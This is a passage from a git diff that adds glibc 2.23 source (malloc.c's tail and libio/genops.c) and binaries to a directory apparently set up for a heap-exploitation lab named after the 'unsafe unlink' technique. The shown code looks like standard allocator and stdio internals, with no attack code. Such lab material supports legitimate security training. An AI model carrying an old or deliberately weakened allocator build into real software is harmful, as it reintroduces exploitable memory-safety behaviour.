+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      mutex_lock (&ar_ptr->mutex);
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r->size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r->size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r->size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      mutex_unlock (&ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   heap->size, heap->mprotect_size);
+	  total_aspace += heap->size;
+	  total_aspace_mprotect += heap->mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
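+
+/*
+   malloc_info writes the XML document assembled above (one <heap> element
+   per arena plus process-wide totals) to the given stream -- a sketch:
+
+     #include <stdio.h>
+     #include <stdlib.h>
+     #include <malloc.h>
+
+     int main (void)
+     {
+       void *p = malloc (0x500);
+       free (p);
+       return malloc_info (0, stdout);   // 0 is the only supported option
+     }
+*/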
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __cfree) weak_alias (__libc_free, cfree)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+weak_alias (__malloc_get_state, malloc_get_state)
+weak_alias (__malloc_set_state, malloc_set_state)
+
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so
new file mode 100755
index 0000000..6000149
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2 b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
new file mode 120000
index 0000000..6a23928
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/ld.so.2
@@ -0,0 +1 @@
+ld-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so
new file mode 100755
index 0000000..df092a0
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc-2.23.so differ
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6 b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
new file mode 120000
index 0000000..a42d666
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libc.so.6
@@ -0,0 +1 @@
+libc-2.23.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
new file mode 100644
index 0000000..5803cbf
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23_unsafe-unlink/libio/genops.c
@@ -0,0 +1,1253 @@
+/* Copyright (C) 1993-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public
+   License as published by the Free Software Foundation; either
+   version 2.1 of the License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; if not, see
+   <http://www.gnu.org/licenses/>.
+
+   As a special exception, if you link the code in this file with
+   files compiled with a GNU compiler to produce an executable,
+   that does not cause the resulting executable to be covered by
+   the GNU Lesser General Public License.  This exception does not
+   however invalidate any other reasons why the executable file
+   might be covered by the GNU Lesser General Public License.
+   This exception applies to code released by its copyright holders
+   in files containing the exception.  */
+
+/* Generic or default I/O operations. */
+
+#include "libioP.h"
+#include <stdlib.h>
+#include <string.h>
+#include <stdbool.h>
+#ifdef _LIBC
+#include <sched.h>
+#endif
+
+#ifdef _IO_MTSAFE_IO
+static _IO_lock_t list_all_lock = _IO_lock_initializer;
+#endif
+
+/* Used to signal modifications to the list of FILE descriptors.  */
+static int _IO_list_all_stamp;
+
+
+static _IO_FILE *run_fp;
+
+#ifdef _IO_MTSAFE_IO
+static void
+flush_cleanup (void *not_used)
+{
+  if (run_fp != NULL)
+    _IO_funlockfile (run_fp);
+  _IO_lock_unlock (list_all_lock);
+}
+#endif
+
+void
+_IO_un_link (struct _IO_FILE_plus *fp)
+{
+  if (fp->file._flags & _IO_LINKED)
+    {
+      struct _IO_FILE **f;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      if (_IO_list_all == NULL)
+	;
+      else if (fp == _IO_list_all)
+	{
+	  _IO_list_all = (struct _IO_FILE_plus *) _IO_list_all->file._chain;
+	  ++_IO_list_all_stamp;
+	}
+      else
+	for (f = &_IO_list_all->file._chain; *f; f = &(*f)->_chain)
+	  if (*f == (_IO_FILE *) fp)
+	    {
+	      *f = fp->file._chain;
+	      ++_IO_list_all_stamp;
+	      break;
+	    }
+      fp->file._flags &= ~_IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_un_link)
+
+void
+_IO_link_in (struct _IO_FILE_plus *fp)
+{
+  if ((fp->file._flags & _IO_LINKED) == 0)
+    {
+      fp->file._flags |= _IO_LINKED;
+#ifdef _IO_MTSAFE_IO
+      _IO_cleanup_region_start_noarg (flush_cleanup);
+      _IO_lock_lock (list_all_lock);
+      run_fp = (_IO_FILE *) fp;
+      _IO_flockfile ((_IO_FILE *) fp);
+#endif
+      fp->file._chain = (_IO_FILE *) _IO_list_all;
+      _IO_list_all = fp;
+      ++_IO_list_all_stamp;
+#ifdef _IO_MTSAFE_IO
+      _IO_funlockfile ((_IO_FILE *) fp);
+      run_fp = NULL;
+      _IO_lock_unlock (list_all_lock);
+      _IO_cleanup_region_end (0);
+#endif
+    }
+}
+libc_hidden_def (_IO_link_in)
+
+/* Return the minimum _pos among the stream's markers.
+   Assumes the current get area is the main get area. */
+_IO_ssize_t _IO_least_marker (_IO_FILE *fp, char *end_p);
+
+_IO_ssize_t
+_IO_least_marker (_IO_FILE *fp, char *end_p)
+{
+  _IO_ssize_t least_so_far = end_p - fp->_IO_read_base;
+  struct _IO_marker *mark;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    if (mark->_pos < least_so_far)
+      least_so_far = mark->_pos;
+  return least_so_far;
+}
+
+/* Switch current get area from backup buffer to (start of) main get area. */
+
+void
+_IO_switch_to_main_get_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags &= ~_IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr. */
+  fp->_IO_read_ptr = fp->_IO_read_base;
+}
+
+/* Switch current get area from main get area to (end of) backup area. */
+
+void
+_IO_switch_to_backup_area (_IO_FILE *fp)
+{
+  char *tmp;
+  fp->_flags |= _IO_IN_BACKUP;
+  /* Swap _IO_read_end and _IO_save_end. */
+  tmp = fp->_IO_read_end;
+  fp->_IO_read_end = fp->_IO_save_end;
+  fp->_IO_save_end = tmp;
+  /* Swap _IO_read_base and _IO_save_base. */
+  tmp = fp->_IO_read_base;
+  fp->_IO_read_base = fp->_IO_save_base;
+  fp->_IO_save_base = tmp;
+  /* Set _IO_read_ptr.  */
+  fp->_IO_read_ptr = fp->_IO_read_end;
+}
+
+int
+_IO_switch_to_get_mode (_IO_FILE *fp)
+{
+  if (fp->_IO_write_ptr > fp->_IO_write_base)
+    if (_IO_OVERFLOW (fp, EOF) == EOF)
+      return EOF;
+  if (_IO_in_backup (fp))
+    fp->_IO_read_base = fp->_IO_backup_base;
+  else
+    {
+      fp->_IO_read_base = fp->_IO_buf_base;
+      if (fp->_IO_write_ptr > fp->_IO_read_end)
+	fp->_IO_read_end = fp->_IO_write_ptr;
+    }
+  fp->_IO_read_ptr = fp->_IO_write_ptr;
+
+  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_read_ptr;
+
+  fp->_flags &= ~_IO_CURRENTLY_PUTTING;
+  return 0;
+}
+libc_hidden_def (_IO_switch_to_get_mode)
+
+void
+_IO_free_backup_area (_IO_FILE *fp)
+{
+  if (_IO_in_backup (fp))
+    _IO_switch_to_main_get_area (fp);  /* Just in case. */
+  free (fp->_IO_save_base);
+  fp->_IO_save_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_IO_backup_base = NULL;
+}
+libc_hidden_def (_IO_free_backup_area)
+
+#if 0
+int
+_IO_switch_to_put_mode (_IO_FILE *fp)
+{
+  fp->_IO_write_base = fp->_IO_read_ptr;
+  fp->_IO_write_ptr = fp->_IO_read_ptr;
+  /* Following is wrong if line- or un-buffered? */
+  fp->_IO_write_end = (fp->_flags & _IO_IN_BACKUP
+		       ? fp->_IO_read_end : fp->_IO_buf_end);
+
+  fp->_IO_read_ptr = fp->_IO_read_end;
+  fp->_IO_read_base = fp->_IO_read_end;
+
+  fp->_flags |= _IO_CURRENTLY_PUTTING;
+  return 0;
+}
+#endif
+
+int
+__overflow (_IO_FILE *f, int ch)
+{
+  /* This is a single-byte stream.  */
+  if (f->_mode == 0)
+    _IO_fwide (f, -1);
+  return _IO_OVERFLOW (f, ch);
+}
+libc_hidden_def (__overflow)
+
+static int save_for_backup (_IO_FILE *fp, char *end_p)
+#ifdef _LIBC
+     internal_function
+#endif
+     ;
+
+static int
+#ifdef _LIBC
+internal_function
+#endif
+save_for_backup (_IO_FILE *fp, char *end_p)
+{
+  /* Append [_IO_read_base..end_p] to backup area. */
+  _IO_ssize_t least_mark = _IO_least_marker (fp, end_p);
+  /* needed_size is how much space we need in the backup area. */
+  _IO_size_t needed_size = (end_p - fp->_IO_read_base) - least_mark;
+  /* FIXME: Dubious arithmetic if pointers are NULL */
+  _IO_size_t current_Bsize = fp->_IO_save_end - fp->_IO_save_base;
+  _IO_size_t avail; /* Extra space available for future expansion. */
+  _IO_ssize_t delta;
+  struct _IO_marker *mark;
+  if (needed_size > current_Bsize)
+    {
+      char *new_buffer;
+      avail = 100;
+      new_buffer = (char *) malloc (avail + needed_size);
+      if (new_buffer == NULL)
+	return EOF;		/* FIXME */
+      if (least_mark < 0)
+	{
+#ifdef _LIBC
+	  __mempcpy (__mempcpy (new_buffer + avail,
+				fp->_IO_save_end + least_mark,
+				-least_mark),
+		     fp->_IO_read_base,
+		     end_p - fp->_IO_read_base);
+#else
+	  memcpy (new_buffer + avail,
+		  fp->_IO_save_end + least_mark,
+		  -least_mark);
+	  memcpy (new_buffer + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+#endif
+	}
+      else
+	memcpy (new_buffer + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = new_buffer;
+      fp->_IO_save_end = new_buffer + avail + needed_size;
+    }
+  else
+    {
+      avail = current_Bsize - needed_size;
+      if (least_mark < 0)
+	{
+	  memmove (fp->_IO_save_base + avail,
+		   fp->_IO_save_end + least_mark,
+		   -least_mark);
+	  memcpy (fp->_IO_save_base + avail - least_mark,
+		  fp->_IO_read_base,
+		  end_p - fp->_IO_read_base);
+	}
+      else if (needed_size > 0)
+	memcpy (fp->_IO_save_base + avail,
+		fp->_IO_read_base + least_mark,
+		needed_size);
+    }
+  fp->_IO_backup_base = fp->_IO_save_base + avail;
+  /* Adjust all the stream markers. */
+  delta = end_p - fp->_IO_read_base;
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_pos -= delta;
+  return 0;
+}
+
+int
+__underflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UNDERFLOW (fp);
+}
+libc_hidden_def (__underflow)
+
+int
+__uflow (_IO_FILE *fp)
+{
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
+    return EOF;
+#endif
+
+  if (fp->_mode == 0)
+    _IO_fwide (fp, -1);
+  if (_IO_in_put_mode (fp))
+    if (_IO_switch_to_get_mode (fp) == EOF)
+      return EOF;
+  if (fp->_IO_read_ptr < fp->_IO_read_end)
+    return *(unsigned char *) fp->_IO_read_ptr++;
+  if (_IO_in_backup (fp))
+    {
+      _IO_switch_to_main_get_area (fp);
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	return *(unsigned char *) fp->_IO_read_ptr++;
+    }
+  if (_IO_have_markers (fp))
+    {
+      if (save_for_backup (fp, fp->_IO_read_end))
+	return EOF;
+    }
+  else if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+  return _IO_UFLOW (fp);
+}
+libc_hidden_def (__uflow)
+
+void
+_IO_setb (_IO_FILE *f, char *b, char *eb, int a)
+{
+  if (f->_IO_buf_base && !(f->_flags & _IO_USER_BUF))
+    free (f->_IO_buf_base);
+  f->_IO_buf_base = b;
+  f->_IO_buf_end = eb;
+  if (a)
+    f->_flags &= ~_IO_USER_BUF;
+  else
+    f->_flags |= _IO_USER_BUF;
+}
+libc_hidden_def (_IO_setb)
+
+void
+_IO_doallocbuf (_IO_FILE *fp)
+{
+  if (fp->_IO_buf_base)
+    return;
+  if (!(fp->_flags & _IO_UNBUFFERED) || fp->_mode > 0)
+    if (_IO_DOALLOCATE (fp) != EOF)
+      return;
+  _IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+}
+libc_hidden_def (_IO_doallocbuf)
+
+int
+_IO_default_underflow (_IO_FILE *fp)
+{
+  return EOF;
+}
+
+int
+_IO_default_uflow (_IO_FILE *fp)
+{
+  int ch = _IO_UNDERFLOW (fp);
+  if (ch == EOF)
+    return EOF;
+  return *(unsigned char *) fp->_IO_read_ptr++;
+}
+libc_hidden_def (_IO_default_uflow)
+
+_IO_size_t
+_IO_default_xsputn (_IO_FILE *f, const void *data, _IO_size_t n)
+{
+  const char *s = (char *) data;
+  _IO_size_t more = n;
+  if (more <= 0)
+    return 0;
+  for (;;)
+    {
+      /* Space available. */
+      if (f->_IO_write_ptr < f->_IO_write_end)
+	{
+	  _IO_size_t count = f->_IO_write_end - f->_IO_write_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
+#else
+	      memcpy (f->_IO_write_ptr, s, count);
+	      f->_IO_write_ptr += count;
+#endif
+	      s += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = f->_IO_write_ptr;
+	      _IO_ssize_t i;
+	      for (i = count; --i >= 0; )
+		*p++ = *s++;
+	      f->_IO_write_ptr = p;
+	    }
+	  more -= count;
+	}
+      if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
+	break;
+      more--;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsputn)
+
+_IO_size_t
+_IO_sgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  /* FIXME handle putback buffer here! */
+  return _IO_XSGETN (fp, data, n);
+}
+libc_hidden_def (_IO_sgetn)
+
+_IO_size_t
+_IO_default_xsgetn (_IO_FILE *fp, void *data, _IO_size_t n)
+{
+  _IO_size_t more = n;
+  char *s = (char*) data;
+  for (;;)
+    {
+      /* Data available. */
+      if (fp->_IO_read_ptr < fp->_IO_read_end)
+	{
+	  _IO_size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
+	  if (count > more)
+	    count = more;
+	  if (count > 20)
+	    {
+#ifdef _LIBC
+	      s = __mempcpy (s, fp->_IO_read_ptr, count);
+#else
+	      memcpy (s, fp->_IO_read_ptr, count);
+	      s += count;
+#endif
+	      fp->_IO_read_ptr += count;
+	    }
+	  else if (count)
+	    {
+	      char *p = fp->_IO_read_ptr;
+	      int i = (int) count;
+	      while (--i >= 0)
+		*s++ = *p++;
+	      fp->_IO_read_ptr = p;
+	    }
+	    more -= count;
+	}
+      if (more == 0 || __underflow (fp) == EOF)
+	break;
+    }
+  return n - more;
+}
+libc_hidden_def (_IO_default_xsgetn)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+#endif
+
+_IO_FILE *
+_IO_default_setbuf (_IO_FILE *fp, char *p, _IO_ssize_t len)
+{
+    if (_IO_SYNC (fp) == EOF)
+	return NULL;
+    if (p == NULL || len == 0)
+      {
+	fp->_flags |= _IO_UNBUFFERED;
+	_IO_setb (fp, fp->_shortbuf, fp->_shortbuf+1, 0);
+      }
+    else
+      {
+	fp->_flags &= ~_IO_UNBUFFERED;
+	_IO_setb (fp, p, p+len, 0);
+      }
+    fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = 0;
+    fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_read_end = 0;
+    return fp;
+}
+
+_IO_off64_t
+_IO_default_seekpos (_IO_FILE *fp, _IO_off64_t pos, int mode)
+{
+  return _IO_SEEKOFF (fp, pos, 0, mode);
+}
+
+int
+_IO_default_doallocate (_IO_FILE *fp)
+{
+  char *buf;
+
+  buf = malloc(_IO_BUFSIZ);
+  if (__glibc_unlikely (buf == NULL))
+    return EOF;
+
+  _IO_setb (fp, buf, buf+_IO_BUFSIZ, 1);
+  return 1;
+}
+libc_hidden_def (_IO_default_doallocate)
+
+void
+_IO_init (_IO_FILE *fp, int flags)
+{
+  _IO_no_init (fp, flags, -1, NULL, NULL);
+}
+libc_hidden_def (_IO_init)
+
+void
+_IO_old_init (_IO_FILE *fp, int flags)
+{
+  fp->_flags = _IO_MAGIC|flags;
+  fp->_flags2 = 0;
+  fp->_IO_buf_base = NULL;
+  fp->_IO_buf_end = NULL;
+  fp->_IO_read_base = NULL;
+  fp->_IO_read_ptr = NULL;
+  fp->_IO_read_end = NULL;
+  fp->_IO_write_base = NULL;
+  fp->_IO_write_ptr = NULL;
+  fp->_IO_write_end = NULL;
+  fp->_chain = NULL; /* Not necessary. */
+
+  fp->_IO_save_base = NULL;
+  fp->_IO_backup_base = NULL;
+  fp->_IO_save_end = NULL;
+  fp->_markers = NULL;
+  fp->_cur_column = 0;
+#if _IO_JUMPS_OFFSET
+  fp->_vtable_offset = 0;
+#endif
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_init (*fp->_lock);
+#endif
+}
+
+void
+_IO_no_init (_IO_FILE *fp, int flags, int orientation,
+	     struct _IO_wide_data *wd, const struct _IO_jump_t *jmp)
+{
+  _IO_old_init (fp, flags);
+  fp->_mode = orientation;
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+  if (orientation >= 0)
+    {
+      fp->_wide_data = wd;
+      fp->_wide_data->_IO_buf_base = NULL;
+      fp->_wide_data->_IO_buf_end = NULL;
+      fp->_wide_data->_IO_read_base = NULL;
+      fp->_wide_data->_IO_read_ptr = NULL;
+      fp->_wide_data->_IO_read_end = NULL;
+      fp->_wide_data->_IO_write_base = NULL;
+      fp->_wide_data->_IO_write_ptr = NULL;
+      fp->_wide_data->_IO_write_end = NULL;
+      fp->_wide_data->_IO_save_base = NULL;
+      fp->_wide_data->_IO_backup_base = NULL;
+      fp->_wide_data->_IO_save_end = NULL;
+
+      fp->_wide_data->_wide_vtable = jmp;
+    }
+  else
+    /* Cause predictable crash when a wide function is called on a byte
+       stream.  */
+    fp->_wide_data = (struct _IO_wide_data *) -1L;
+#endif
+  fp->_freeres_list = NULL;
+}
+
+int
+_IO_default_sync (_IO_FILE *fp)
+{
+  return 0;
+}
+
+/* The way the C++ classes are mapped into the C functions in the
+   current implementation, this function can get called twice! */
+
+void
+_IO_default_finish (_IO_FILE *fp, int dummy)
+{
+  struct _IO_marker *mark;
+  if (fp->_IO_buf_base && !(fp->_flags & _IO_USER_BUF))
+    {
+      free (fp->_IO_buf_base);
+      fp->_IO_buf_base = fp->_IO_buf_end = NULL;
+    }
+
+  for (mark = fp->_markers; mark != NULL; mark = mark->_next)
+    mark->_sbuf = NULL;
+
+  if (fp->_IO_save_base)
+    {
+      free (fp->_IO_save_base);
+      fp->_IO_save_base = NULL;
+    }
+
+  _IO_un_link ((struct _IO_FILE_plus *) fp);
+
+#ifdef _IO_MTSAFE_IO
+  if (fp->_lock != NULL)
+    _IO_lock_fini (*fp->_lock);
+#endif
+}
+libc_hidden_def (_IO_default_finish)
+
+_IO_off64_t
+_IO_default_seekoff (_IO_FILE *fp, _IO_off64_t offset, int dir, int mode)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_sputbackc (_IO_FILE *fp, int c)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base
+      && (unsigned char)fp->_IO_read_ptr[-1] == (unsigned char)c)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) c;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, c);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+libc_hidden_def (_IO_sputbackc)
+
+int
+_IO_sungetc (_IO_FILE *fp)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) *fp->_IO_read_ptr;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, EOF);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+
+#if 0 /* Work in progress */
+/* Seems not to be needed.  */
+#if 0
+void
+_IO_set_column (_IO_FILE *fp, int c)
+{
+  if (c == -1)
+    fp->_column = -1;
+  else
+    fp->_column = c - (fp->_IO_write_ptr - fp->_IO_write_base);
+}
+#else
+int
+_IO_set_column (_IO_FILE *fp, int i)
+{
+  fp->_cur_column = i + 1;
+  return 0;
+}
+#endif
+#endif
+
+
+unsigned
+_IO_adjust_column (unsigned start, const char *line, int count)
+{
+  const char *ptr = line + count;
+  while (ptr > line)
+    if (*--ptr == '\n')
+      return line + count - ptr - 1;
+  return start + count;
+}
+libc_hidden_def (_IO_adjust_column)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_get_column (_IO_FILE *fp)
+{
+  if (fp->_cur_column)
+    return _IO_adjust_column (fp->_cur_column - 1,
+			      fp->_IO_write_base,
+			      fp->_IO_write_ptr - fp->_IO_write_base);
+  return -1;
+}
+#endif
+
+
+int
+_IO_flush_all_lockp (int do_lock)
+{
+  int result = 0;
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
+  if (do_lock)
+    _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      if (do_lock)
+	_IO_flockfile (fp);
+
+      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+	   || (_IO_vtable_offset (fp) == 0
+	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
